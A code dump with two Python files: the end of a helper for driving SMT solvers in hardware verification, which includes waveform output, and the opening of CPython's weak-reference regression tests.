for netname in sorted(self.modinfo[mod].wsize.keys()):
if not regs_only or netname in self.modinfo[mod].registers:
nets.append(cursor + [netname])
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
hiernets_worker(nets, celltype, cursor + [cellname])
nets = list()
hiernets_worker(nets, top, [])
return nets
def hieranyconsts(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].anyconsts.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hieranyseqs(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].anyseqs.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hierallconsts(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].allconsts.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hierallseqs(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].allseqs.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hiermems(self, top):
def hiermems_worker(mems, mod, cursor):
for memname in sorted(self.modinfo[mod].memories.keys()):
mems.append(cursor + [memname])
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
hiermems_worker(mems, celltype, cursor + [cellname])
mems = list()
hiermems_worker(mems, top, [])
return mems
def read(self):
stmt = []
count_brackets = 0
while True:
if self.solver == "dummy":
line = self.dummy_fd.readline().strip()
else:
line = self.p_read().strip()
if self.dummy_file is not None:
self.dummy_fd.write(line + "\n")
count_brackets += line.count("(")
count_brackets -= line.count(")")
stmt.append(line)
if self.debug_print:
print("< %s" % line)
if count_brackets == 0:
break
if self.solver != "dummy" and self.p.poll():
print("%s Solver terminated unexpectedly: %s" % (self.timestamp(), "".join(stmt)), flush=True)
sys.exit(1)
stmt = "".join(stmt)
if stmt.startswith("(error"):
print("%s Solver Error: %s" % (self.timestamp(), stmt), flush=True)
if self.solver != "dummy":
self.p_close()
sys.exit(1)
return stmt
def check_sat(self):
if self.debug_print:
print("> (check-sat)")
if self.debug_file and not self.nocomments:
print("; running check-sat..", file=self.debug_file)
self.debug_file.flush()
if self.solver != "dummy":
if self.noincr:
if self.p is not None:
self.p_close()
self.p_open()
for cache_ctx in self.smt2cache:
for cache_stmt in cache_ctx:
self.p_write(cache_stmt + "\n", False)
self.p_write("(check-sat)\n", True)
if self.timeinfo:
i = 0
s = "/-\|"
count = 0
num_bs = 0
while self.p_poll():
count += 1
if count < 25:
continue
if count % 10 == 0 or count == 25:
secs = count // 10
if secs < 60:
m = "(%d seconds)" % secs
elif secs < 60*60:
m = "(%d seconds -- %d:%02d)" % (secs, secs // 60, secs % 60)
else:
m = "(%d seconds -- %d:%02d:%02d)" % (secs, secs // (60*60), (secs // 60) % 60, secs % 60)
print("%s %s %c" % ("\b \b" * num_bs, m, s[i]), end="", file=sys.stderr)
num_bs = len(m) + 3
else:
print("\b" + s[i], end="", file=sys.stderr)
sys.stderr.flush()
i = (i + 1) % len(s)
if num_bs != 0:
print("\b \b" * num_bs, end="", file=sys.stderr)
sys.stderr.flush()
else:
count = 0
while self.p_poll(60):
count += 1
msg = None
if count == 1:
msg = "1 minute"
elif count in [5, 10, 15, 30]:
msg = "%d minutes" % count
elif count == 60:
msg = "1 hour"
elif count % 60 == 0:
msg = "%d hours" % (count // 60)
if msg is not None:
print("%s waiting for solver (%s)" % (self.timestamp(), msg), flush=True)
result = self.read()
if self.debug_file:
print("(set-info :status %s)" % result, file=self.debug_file)
print("(check-sat)", file=self.debug_file)
self.debug_file.flush()
if result not in ["sat", "unsat"]:
if result == "":
print("%s Unexpected EOF response from solver." % (self.timestamp()), flush=True)
else:
print("%s Unexpected response from solver: %s" % (self.timestamp(), result), flush=True)
if self.solver != "dummy":
self.p_close()
sys.exit(1)
return result
def parse(self, stmt):
def worker(stmt):
if stmt[0] == '(':
expr = []
cursor = 1
while stmt[cursor] != ')':
el, le = worker(stmt[cursor:])
expr.append(el)
cursor += le
return expr, cursor+1
if stmt[0] == '|':
expr = "|"
cursor = 1
while stmt[cursor] != '|':
expr += stmt[cursor]
cursor += 1
expr += "|"
return expr, cursor+1
if stmt[0] in [" ", "\t", "\r", "\n"]:
el, le = worker(stmt[1:])
return el, le+1
expr = ""
cursor = 0
while stmt[cursor] not in ["(", ")", "|", " ", "\t", "\r", "\n"]:
expr += stmt[cursor]
cursor += 1
return expr, cursor
return worker(stmt)[0]
def unparse(self, stmt):
if isinstance(stmt, list):
return "(" + " ".join([self.unparse(s) for s in stmt]) + ")"
return stmt
def bv2hex(self, v):
h = ""
v = self.bv2bin(v)
while len(v) > 0:
d = 0
if len(v) > 0 and v[-1] == "1": d += 1
if len(v) > 1 and v[-2] == "1": d += 2
if len(v) > 2 and v[-3] == "1": d += 4
if len(v) > 3 and v[-4] == "1": d += 8
h = hex(d)[2:] + h
if len(v) < 4: break
v = v[:-4]
return h
def bv2bin(self, v):
if type(v) is list and len(v) == 3 and v[0] == "_" and v[1].startswith("bv"):
x, n = int(v[1][2:]), int(v[2])
return "".join("1" if (x & (1 << i)) else "0" for i in range(n-1, -1, -1))
if v == "true": return "1"
if v == "false": return "0"
if v.startswith("#b"):
return v[2:]
if v.startswith("#x"):
return "".join(hex_dict.get(x) for x in v[2:])
assert False
def bv2int(self, v):
return int(self.bv2bin(v), 2)
def get(self, expr):
self.write("(get-value (%s))" % (expr))
return self.parse(self.read())[0][1]
def get_list(self, expr_list):
if len(expr_list) == 0:
return []
self.write("(get-value (%s))" % " ".join(expr_list))
return [n[1] for n in self.parse(self.read())]
def get_path(self, mod, path):
assert mod in self.modinfo
path = path.split(".")
for i in range(len(path)-1):
first = ".".join(path[0:i+1])
second = ".".join(path[i+1:])
if first in self.modinfo[mod].cells:
nextmod = self.modinfo[mod].cells[first]
return [first] + self.get_path(nextmod, second)
return [".".join(path)]
def net_expr(self, mod, base, path):
if len(path) == 0:
return base
if len(path) == 1:
assert mod in self.modinfo
if path[0] == "":
return base
if path[0] in self.modinfo[mod].cells:
return "(|%s_h %s| %s)" % (mod, path[0], base)
if path[0] in self.modinfo[mod].wsize:
return "(|%s_n %s| %s)" % (mod, path[0], base)
if path[0] in self.modinfo[mod].memories:
return "(|%s_m %s| %s)" % (mod, path[0], base)
assert 0
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].cells
nextmod = self.modinfo[mod].cells[path[0]]
nextbase = "(|%s_h %s| %s)" % (mod, path[0], base)
return self.net_expr(nextmod, nextbase, path[1:])
def net_width(self, mod, net_path):
for i in range(len(net_path)-1):
assert mod in self.modinfo
assert net_path[i] in self.modinfo[mod].cells
mod = self.modinfo[mod].cells[net_path[i]]
assert mod in self.modinfo
assert net_path[-1] in self.modinfo[mod].wsize
return self.modinfo[mod].wsize[net_path[-1]]
def net_clock(self, mod, net_path):
for i in range(len(net_path)-1):
assert mod in self.modinfo
assert net_path[i] in self.modinfo[mod].cells
mod = self.modinfo[mod].cells[net_path[i]]
assert mod in self.modinfo
if net_path[-1] not in self.modinfo[mod].clocks:
return None
return self.modinfo[mod].clocks[net_path[-1]]
def net_exists(self, mod, net_path):
for i in range(len(net_path)-1):
if mod not in self.modinfo: return False
if net_path[i] not in self.modinfo[mod].cells: return False
mod = self.modinfo[mod].cells[net_path[i]]
if mod not in self.modinfo: return False
if net_path[-1] not in self.modinfo[mod].wsize: return False
return True
def mem_exists(self, mod, mem_path):
for i in range(len(mem_path)-1):
if mod not in self.modinfo: return False
if mem_path[i] not in self.modinfo[mod].cells: return False
mod = self.modinfo[mod].cells[mem_path[i]]
if mod not in self.modinfo: return False
if mem_path[-1] not in self.modinfo[mod].memories: return False
return True
def mem_expr(self, mod, base, path, port=None, infomode=False):
if len(path) == 1:
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].memories
if infomode:
return self.modinfo[mod].memories[path[0]]
return "(|%s_m%s %s| %s)" % (mod, "" if port is None else ":%s" % port, path[0], base)
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].cells
nextmod = self.modinfo[mod].cells[path[0]]
nextbase = "(|%s_h %s| %s)" % (mod, path[0], base)
return self.mem_expr(nextmod, nextbase, path[1:], port=port, infomode=infomode)
def mem_info(self, mod, path):
return self.mem_expr(mod, "", path, infomode=True)
def get_net(self, mod_name, net_path, state_name):
return self.get(self.net_expr(mod_name, state_name, net_path))
def get_net_list(self, mod_name, net_path_list, state_name):
return self.get_list([self.net_expr(mod_name, state_name, n) for n in net_path_list])
def get_net_hex(self, mod_name, net_path, state_name):
return self.bv2hex(self.get_net(mod_name, net_path, state_name))
def get_net_hex_list(self, mod_name, net_path_list, state_name):
return [self.bv2hex(v) for v in self.get_net_list(mod_name, net_path_list, state_name)]
def get_net_bin(self, mod_name, net_path, state_name):
return self.bv2bin(self.get_net(mod_name, net_path, state_name))
def get_net_bin_list(self, mod_name, net_path_list, state_name):
return [self.bv2bin(v) for v in self.get_net_list(mod_name, net_path_list, state_name)]
def wait(self):
if self.p is not None:
self.p.wait()
self.p_close()
class SmtOpts:
def __init__(self):
self.shortopts = "s:S:v"
self.longopts = ["unroll", "noincr", "noprogress", "dump-smt2=", "logic=", "dummy=", "info=", "nocomments"]
self.solver = "yices"
self.solver_opts = list()
self.debug_print = False
self.debug_file = None
self.dummy_file = None
self.unroll = False
self.noincr = False
self.timeinfo = os.name != "nt"
self.logic = None
self.info_stmts = list()
self.nocomments = False
def handle(self, o, a):
if o == "-s":
self.solver = a
elif o == "-S":
self.solver_opts.append(a)
elif o == "-v":
self.debug_print = True
elif o == "--unroll":
self.unroll = True
elif o == "--noincr":
self.noincr = True
elif o == "--noprogress":
self.timeinfo = False
elif o == "--dump-smt2":
self.debug_file = open(a, "w")
elif o == "--logic":
self.logic = a
elif o == "--dummy":
self.dummy_file = a
elif o == "--info":
self.info_stmts.append(a)
elif o == "--nocomments":
self.nocomments = True
else:
return False
return True
def helpmsg(self):
return """
-s <solver>
set SMT solver: z3, yices, boolector, cvc4, mathsat, dummy
default: yices
-S <opt>
pass <opt> as command line argument to the solver
--logic <smt2_logic>
use the specified SMT2 logic (e.g. QF_AUFBV)
--dummy <filename>
if solver is "dummy", read solver output from that file
otherwise: write solver output to that file
-v
enable debug output
--unroll
unroll uninterpreted functions
--noincr
don't use incremental solving, instead restart solver for
each (check-sat). This also avoids (push) and (pop).
--noprogress
disable timer display during solving
(this option is set implicitly on Windows)
--dump-smt2 <filename>
write smt2 statements to file
--info <smt2-info-stmt>
include the specified smt2 info statement in the smt2 output
--nocomments
strip all comments from the generated smt2 code
"""
class MkVcd:
def __init__(self, f):
self.f = f
self.t = -1
self.nets = dict()
self.clocks = dict()
def add_net(self, path, width):
path = tuple(path)
assert self.t == -1
key = "n%d" % len(self.nets)
self.nets[path] = (key, width)
def add_clock(self, path, edge):
path = tuple(path)
assert self.t == -1
key = "n%d" % len(self.nets)
self.nets[path] = (key, 1)
self.clocks[path] = (key, edge)
def set_net(self, path, bits):
path = tuple(path)
assert self.t >= 0
assert path in self.nets
if path not in self.clocks:
print("b%s %s" % (bits, self.nets[path][0]), file=self.f)
def escape_name(self, name):
name = re.sub(r"\[([0-9a-zA-Z_]*[a-zA-Z_][0-9a-zA-Z_]*)\]", r"<\1>", name)
if re.match("[\[\]]", name) and name[0] != "\\":
name = "\\" + name
return name
def set_time(self, t):
assert t >= self.t
if t != self.t:
if self.t == -1:
print("$var integer 32 t smt_step $end", file=self.f)
print("$var event 1 ! smt_clock $end", file=self.f)
scope = []
for path in sorted(self.nets):
key, width = self.nets[path]
uipath = list(path)
if "." in uipath[-1]:
uipath = uipath[0:-1] + uipath[-1].split(".")
for i in range(len(uipath)):
uipath[i] = re.sub(r"\[([^\]]*)\]", r"<\1>", uipath[i])
while uipath[:len(scope)] != scope:
print("$upscope $end", file=self.f)
scope = scope[:-1]
while uipath[:-1] != scope:
print("$scope module %s $end" % uipath[len(scope)], file=self.f)
scope.append(uipath[len(scope)])
if path in self.clocks and self.clocks[path][1] == "event":
print("$var event 1 %s %s $end" % (key, uipath[-1]), file=self.f)
else:
print("$var wire %d %s %s $end" % (width, key, uipath[-1]), file=self.f)
for i in range(len(scope)):
print("$upscope $end", file=self.f)
print("$enddefinitions $end", file=self.f)
self.t = t
assert self.t >= 0
if self.t > 0:
print("#%d" % (10 * self.t - 5), file=self.f)
for path in sorted(self.clocks.keys()):
if self.clocks[path][1] == "posedge":
print("b0 %s" % self.nets[path][0], file=self.f)
elif self.clocks[path][1] == "negedge":
print("b1 %s" % self.nets[path][0], file=self.f)
print("#%d" % (10 * self.t), file=self.f)
print("1!", file=self.f)
print("b%s t" % format(self.t, "032b"), file=self.f)
for path in sorted(self.clocks.keys()):
if self.clocks[path][1] == "negedge":
print("b0 %s" % self.nets[path][0], file=self.f)
else:
print("b1 %s" % self.nets[path][0], file=self.f)
|
test_weakref.py
|
import gc
import sys
import unittest
import collections
import weakref
import operator
import contextlib
import copy
import threading
import time
import random
from test import support
from test.support import script_helper, ALWAYS_EQ
# Used in ReferencesTestCase.test_ref_created_during_del() .
ref_from_del = None
# Used by FinalizeTestCase as a global that may be replaced by None
# when the interpreter shuts down.
_global_var = 'foobar'
class C:
def method(self):
pass
class Callable:
bar = None
def __call__(self, x):
self.bar = x
def create_function():
def f(): pass
return f
def create_bound_method():
return C().method
class Object:
def __init__(self, arg):
self.arg = arg
def __repr__(self):
return "<Object %r>" % self.arg
def __eq__(self, other):
if isinstance(other, Object):
return self.arg == other.arg
return NotImplemented
def __lt__(self, other):
if isinstance(other, Object):
return self.arg < other.arg
return NotImplemented
def __hash__(self):
return hash(self.arg)
def some_method(self):
return 4
def other_method(self):
return 5
class RefCycle:
def __init__(self):
self.cycle = self
class TestBase(unittest.TestCase):
def setUp(self):
self.cbcalled = 0
def callback(self, ref):
self.cbcalled += 1
@contextlib.contextmanager
def collect_in_thread(period=0.0001):
"""
Ensure GC collections happen in a different thread, at a high frequency.
"""
please_stop = False
def collect():
while not please_stop:
time.sleep(period)
gc.collect()
with support.disable_gc():
t = threading.Thread(target=collect)
t.start()
try:
yield
finally:
please_stop = True
t.join()
class ReferencesTestCase(TestBase):
def test_basic_ref(self):
self.check_basic_ref(C)
self.check_basic_ref(create_function)
self.check_basic_ref(create_bound_method)
# Just make sure the tp_repr handler doesn't raise an exception.
# Live reference:
o = C()
wr = weakref.ref(o)
repr(wr)
# Dead reference:
del o
repr(wr)
def test_basic_callback(self):
self.check_basic_callback(C)
self.check_basic_callback(create_function)
self.check_basic_callback(create_bound_method)
@support.cpython_only
def test_cfunction(self):
import _testcapi
create_cfunction = _testcapi.create_cfunction
f = create_cfunction()
wr = weakref.ref(f)
self.assertIs(wr(), f)
del f
self.assertIsNone(wr())
self.check_basic_ref(create_cfunction)
self.check_basic_callback(create_cfunction)
def test_multiple_callbacks(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del o
self.assertIsNone(ref1(), "expected reference to be invalidated")
self.assertIsNone(ref2(), "expected reference to be invalidated")
self.assertEqual(self.cbcalled, 2,
"callback not called the right number of times")
def test_multiple_selfref_callbacks(self):
# Make sure all references are invalidated before callbacks are called
#
# What's important here is that we're using the first
# reference in the callback invoked on the second reference
# (the most recently created ref is cleaned up first). This
# tests that all references to the object are invalidated
# before any of the callbacks are invoked, so that we only
# have one invocation of _weakref.c:cleanup_helper() active
# for a particular object at a time.
#
def callback(object, self=self):
self.ref()
c = C()
self.ref = weakref.ref(c, callback)
ref1 = weakref.ref(c, callback)
del c
def test_constructor_kwargs(self):
c = C()
self.assertRaises(TypeError, weakref.ref, c, callback=None)
def test_proxy_ref(self):
o = C()
o.bar = 1
ref1 = weakref.proxy(o, self.callback)
ref2 = weakref.proxy(o, self.callback)
del o
def check(proxy):
proxy.bar
self.assertRaises(ReferenceError, check, ref1)
self.assertRaises(ReferenceError, check, ref2)
self.assertRaises(ReferenceError, bool, weakref.proxy(C()))
self.assertEqual(self.cbcalled, 2)
def check_basic_ref(self, factory):
o = factory()
ref = weakref.ref(o)
self.assertIsNotNone(ref(),
"weak reference to live object should be live")
o2 = ref()
self.assertIs(o, o2,
"<ref>() should return original object if live")
def check_basic_callback(self, factory):
self.cbcalled = 0
o = factory()
ref = weakref.ref(o, self.callback)
del o
self.assertEqual(self.cbcalled, 1,
"callback did not properly set 'cbcalled'")
self.assertIsNone(ref(),
"ref2 should be dead after deleting object reference")
def test_ref_reuse(self):
o = C()
ref1 = weakref.ref(o)
# create a proxy to make sure that there's an intervening creation
# between these two; it should make no difference
proxy = weakref.proxy(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
o = C()
proxy = weakref.proxy(o)
ref1 = weakref.ref(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
self.assertEqual(weakref.getweakrefcount(o), 2,
"wrong weak ref count for object")
del proxy
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong weak ref count for object after deleting proxy")
def test_proxy_reuse(self):
o = C()
proxy1 = weakref.proxy(o)
ref = weakref.ref(o)
proxy2 = weakref.proxy(o)
self.assertIs(proxy1, proxy2,
"proxy object w/out callback should have been re-used")
def test_basic_proxy(self):
o = C()
self.check_proxy(o, weakref.proxy(o))
L = collections.UserList()
p = weakref.proxy(L)
self.assertFalse(p, "proxy for empty UserList should be false")
p.append(12)
self.assertEqual(len(L), 1)
self.assertTrue(p, "proxy for non-empty UserList should be true")
p[:] = [2, 3]
self.assertEqual(len(L), 2)
self.assertEqual(len(p), 2)
self.assertIn(3, p, "proxy didn't support __contains__() properly")
p[1] = 5
self.assertEqual(L[1], 5)
self.assertEqual(p[1], 5)
L2 = collections.UserList(L)
p2 = weakref.proxy(L2)
self.assertEqual(p, p2)
## self.assertEqual(repr(L2), repr(p2))
L3 = collections.UserList(range(10))
p3 = weakref.proxy(L3)
self.assertEqual(L3[:], p3[:])
self.assertEqual(L3[5:], p3[5:])
self.assertEqual(L3[:5], p3[:5])
self.assertEqual(L3[2:5], p3[2:5])
def test_proxy_unicode(self):
# See bug 5037
class C(object):
def __str__(self):
return "string"
def __bytes__(self):
return b"bytes"
instance = C()
self.assertIn("__bytes__", dir(weakref.proxy(instance)))
self.assertEqual(bytes(weakref.proxy(instance)), b"bytes")
def test_proxy_index(self):
class C:
def __index__(self):
return 10
o = C()
p = weakref.proxy(o)
self.assertEqual(operator.index(p), 10)
def test_proxy_div(self):
class C:
def __floordiv__(self, other):
return 42
def __ifloordiv__(self, other):
return 21
o = C()
p = weakref.proxy(o)
self.assertEqual(p // 5, 42)
p //= 5
self.assertEqual(p, 21)
def test_proxy_matmul(self):
class C:
def __matmul__(self, other):
return 1729
def __rmatmul__(self, other):
return -163
def __imatmul__(self, other):
return 561
o = C()
p = weakref.proxy(o)
self.assertEqual(p @ 5, 1729)
self.assertEqual(5 @ p, -163)
p @= 5
self.assertEqual(p, 561)
# The PyWeakref_* C API is documented as allowing either NULL or
# None as the value for the callback, where either means "no
# callback". The "no callback" ref and proxy objects are supposed
# to be shared so long as they exist by all callers so long as
# they are active. In Python 2.3.3 and earlier, this guarantee
# was not honored, and was broken in different ways for
# PyWeakref_NewRef() and PyWeakref_NewProxy(). (Two tests.)
def test_shared_ref_without_callback(self):
self.check_shared_without_callback(weakref.ref)
def test_shared_proxy_without_callback(self):
self.check_shared_without_callback(weakref.proxy)
def check_shared_without_callback(self, makeref):
o = Object(1)
p1 = makeref(o, None)
p2 = makeref(o, None)
self.assertIs(p1, p2, "both callbacks were None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o, None)
self.assertIs(p1, p2, "callbacks were NULL, None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o)
self.assertIs(p1, p2, "both callbacks were NULL in the C API")
del p1, p2
p1 = makeref(o, None)
p2 = makeref(o)
self.assertIs(p1, p2, "callbacks were None, NULL in the C API")
def test_callable_proxy(self):
o = Callable()
ref1 = weakref.proxy(o)
self.check_proxy(o, ref1)
self.assertIs(type(ref1), weakref.CallableProxyType,
"proxy is not of callable type")
ref1('twinkies!')
self.assertEqual(o.bar, 'twinkies!',
"call through proxy not passed through to original")
ref1(x='Splat.')
self.assertEqual(o.bar, 'Splat.',
"call through proxy not passed through to original")
# expect due to too few args
self.assertRaises(TypeError, ref1)
# expect due to too many args
self.assertRaises(TypeError, ref1, 1, 2, 3)
def check_proxy(self, o, proxy):
o.foo = 1
self.assertEqual(proxy.foo, 1,
"proxy does not reflect attribute addition")
o.foo = 2
self.assertEqual(proxy.foo, 2,
"proxy does not reflect attribute modification")
del o.foo
self.assertFalse(hasattr(proxy, 'foo'),
"proxy does not reflect attribute removal")
proxy.foo = 1
self.assertEqual(o.foo, 1,
"object does not reflect attribute addition via proxy")
proxy.foo = 2
self.assertEqual(o.foo, 2,
"object does not reflect attribute modification via proxy")
del proxy.foo
self.assertFalse(hasattr(o, 'foo'),
"object does not reflect attribute removal via proxy")
def test_proxy_deletion(self):
# Test clearing of SF bug #762891
class Foo:
result = None
def __delitem__(self, accessor):
self.result = accessor
g = Foo()
f = weakref.proxy(g)
del f[0]
self.assertEqual(f.result, 0)
def test_proxy_bool(self):
# Test clearing of SF bug #1170766
class List(list): pass
lyst = List()
self.assertEqual(bool(weakref.proxy(lyst)), bool(lyst))
def test_proxy_iter(self):
# Test fails with a debug build of the interpreter
# (see bpo-38395).
obj = None
class MyObj:
def __iter__(self):
nonlocal obj
del obj
return NotImplemented
obj = MyObj()
p = weakref.proxy(obj)
with self.assertRaises(TypeError):
# "blech" in p calls MyObj.__iter__ through the proxy,
# without keeping a reference to the real object, so it
# can be killed in the middle of the call
"blech" in p
def test_getweakrefcount(self):
o = C()
ref1 = weakref.ref(o)
ref2 = weakref.ref(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 2,
"got wrong number of weak reference objects")
proxy1 = weakref.proxy(o)
proxy2 = weakref.proxy(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 4,
"got wrong number of weak reference objects")
del ref1, ref2, proxy1, proxy2
self.assertEqual(weakref.getweakrefcount(o), 0,
"weak reference objects not unlinked from"
" referent when discarded.")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefcount(1), 0,
"got wrong number of weak reference objects for int")
def test_getweakrefs(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref1
self.assertEqual(weakref.getweakrefs(o), [ref2],
"list of refs does not match")
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref2
self.assertEqual(weakref.getweakrefs(o), [ref1],
"list of refs does not match")
del ref1
self.assertEqual(weakref.getweakrefs(o), [],
"list of refs not cleared")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefs(1), [],
"list of refs does not match for int")
def test_newstyle_number_ops(self):
class F(float):
pass
f = F(2.0)
p = weakref.proxy(f)
self.assertEqual(p + 1.0, 3.0)
self.assertEqual(1.0 + p, 3.0) # this used to SEGV
def test_callbacks_protected(self):
# Callbacks protected from already-set exceptions?
# Regression test for SF bug #478534.
class BogusError(Exception):
pass
data = {}
def remove(k):
del data[k]
def encapsulate():
f = lambda : ()
data[weakref.ref(f, remove)] = None
raise BogusError
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
def test_sf_bug_840829(self):
# "weakref callbacks and gc corrupt memory"
# subtype_dealloc erroneously exposed a new-style instance
# already in the process of getting deallocated to gc,
# causing double-deallocation if the instance had a weakref
# callback that triggered gc.
# If the bug exists, there probably won't be an obvious symptom
# in a release build. In a debug build, a segfault will occur
# when the second attempt to remove the instance from the "list
# of all objects" occurs.
import gc
class C(object):
pass
c = C()
wr = weakref.ref(c, lambda ignore: gc.collect())
del c
# There endeth the first part. It gets worse.
del wr
c1 = C()
c1.i = C()
wr = weakref.ref(c1.i, lambda ignore: gc.collect())
c2 = C()
c2.c1 = c1
del c1 # still alive because c2 points to it
# Now when subtype_dealloc gets called on c2, it's not enough just
# that c2 is immune from gc while the weakref callbacks associated
# with c2 execute (there are none in this 2nd half of the test, btw).
# subtype_dealloc goes on to call the base classes' deallocs too,
# so any gc triggered by weakref callbacks associated with anything
# torn down by a base class dealloc can also trigger double
# deallocation of c2.
del c2
def test_callback_in_cycle_1(self):
import gc
class J(object):
pass
class II(object):
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
# Now J and II are each in a self-cycle (as all new-style class
# objects are, since their __mro__ points back to them). I holds
# both a weak reference (I.wr) and a strong reference (I.J) to class
# J. I is also in a cycle (I.wr points to a weakref that references
# I.acallback). When we del these three, they all become trash, but
# the cycles prevent any of them from getting cleaned up immediately.
# Instead they have to wait for cyclic gc to deduce that they're
# trash.
#
# gc used to call tp_clear on all of them, and the order in which
# it does that is pretty accidental. The exact order in which we
# built up these things manages to provoke gc into running tp_clear
# in just the right order (I last). Calling tp_clear on II leaves
# behind an insane class object (its __mro__ becomes NULL). Calling
# tp_clear on J breaks its self-cycle, but J doesn't get deleted
# just then because of the strong reference from I.J. Calling
# tp_clear on I starts to clear I's __dict__, and just happens to
# clear I.J first -- I.wr is still intact. That removes the last
# reference to J, which triggers the weakref callback. The callback
# tries to do "self.J", and instances of new-style classes look up
# attributes ("J") in the class dict first. The class (II) wants to
# search II.__mro__, but that's NULL. The result was a segfault in
# a release build, and an assert failure in a debug build.
del I, J, II
gc.collect()
def test_callback_in_cycle_2(self):
import gc
# This is just like test_callback_in_cycle_1, except that II is an
# old-style class. The symptom is different then: an instance of an
# old-style class looks in its own __dict__ first. 'J' happens to
# get cleared from I.__dict__ before 'wr', and 'J' was never in II's
# __dict__, so the attribute isn't found. The difference is that
# the old-style II doesn't have a NULL __mro__ (it doesn't have any
# __mro__), so no segfault occurs. Instead it got:
# test_callback_in_cycle_2 (__main__.ReferencesTestCase) ...
# Exception exceptions.AttributeError:
# "II instance has no attribute 'J'" in <bound method II.acallback
# of <?.II instance at 0x00B9B4B8>> ignored
class J(object):
pass
class II:
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
del I, J, II
gc.collect()
def test_callback_in_cycle_3(self):
import gc
# This one broke the first patch that fixed the last two. In this
# case, the objects reachable from the callback aren't also reachable
# from the object (c1) *triggering* the callback: you can get to
# c1 from c2, but not vice-versa. The result was that c2's __dict__
# got tp_clear'ed by the time the c2.cb callback got invoked.
class C:
def cb(self, ignore):
self.me
self.c1
self.wr
c1, c2 = C(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2
gc.collect()
def test_callback_in_cycle_4(self):
import gc
# Like test_callback_in_cycle_3, except c2 and c1 have different
# classes. c2's class (C) isn't reachable from c1 then, so protecting
# objects reachable from the dying object (c1) isn't enough to stop
# c2's class (C) from getting tp_clear'ed before c2.cb is invoked.
# The result was a segfault (C.__mro__ was NULL when the callback
# tried to look up self.me).
class C(object):
def cb(self, ignore):
self.me
self.c1
self.wr
class D:
pass
c1, c2 = D(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2, C, D
gc.collect()
def test_callback_in_cycle_resurrection(self):
import gc
# Do something nasty in a weakref callback: resurrect objects
# from dead cycles. For this to be attempted, the weakref and
# its callback must also be part of the cyclic trash (else the
# objects reachable via the callback couldn't be in cyclic trash
# to begin with -- the callback would act like an external root).
# But gc clears trash weakrefs with callbacks early now, which
# disables the callbacks, so the callbacks shouldn't get called
# at all (and so nothing actually gets resurrected).
alist = []
class C(object):
def __init__(self, value):
self.attribute = value
def acallback(self, ignore):
alist.append(self.c)
c1, c2 = C(1), C(2)
c1.c = c2
c2.c = c1
c1.wr = weakref.ref(c2, c1.acallback)
c2.wr = weakref.ref(c1, c2.acallback)
def C_went_away(ignore):
alist.append("C went away")
wr = weakref.ref(C, C_went_away)
del c1, c2, C # make them all trash
self.assertEqual(alist, []) # del isn't enough to reclaim anything
gc.collect()
# c1.wr and c2.wr were part of the cyclic trash, so should have
# been cleared without their callbacks executing. OTOH, the weakref
# to C is bound to a function local (wr), and wasn't trash, so that
# callback should have been invoked when C went away.
self.assertEqual(alist, ["C went away"])
# The remaining weakref should be dead now (its callback ran).
self.assertEqual(wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_callbacks_on_callback(self):
import gc
# Set up weakref callbacks *on* weakref callbacks.
alist = []
def safe_callback(ignore):
alist.append("safe_callback called")
class C(object):
def cb(self, ignore):
alist.append("cb called")
c, d = C(), C()
c.other = d
d.other = c
callback = c.cb
c.wr = weakref.ref(d, callback) # this won't trigger
d.wr = weakref.ref(callback, d.cb) # ditto
external_wr = weakref.ref(callback, safe_callback) # but this will
self.assertIs(external_wr(), callback)
# The weakrefs attached to c and d should get cleared, so that
# C.cb is never called. But external_wr isn't part of the cyclic
# trash, and no cyclic trash is reachable from it, so safe_callback
# should get invoked when the bound method object callback (c.cb)
# -- which is itself a callback, and also part of the cyclic trash --
# gets reclaimed at the end of gc.
del callback, c, d, C
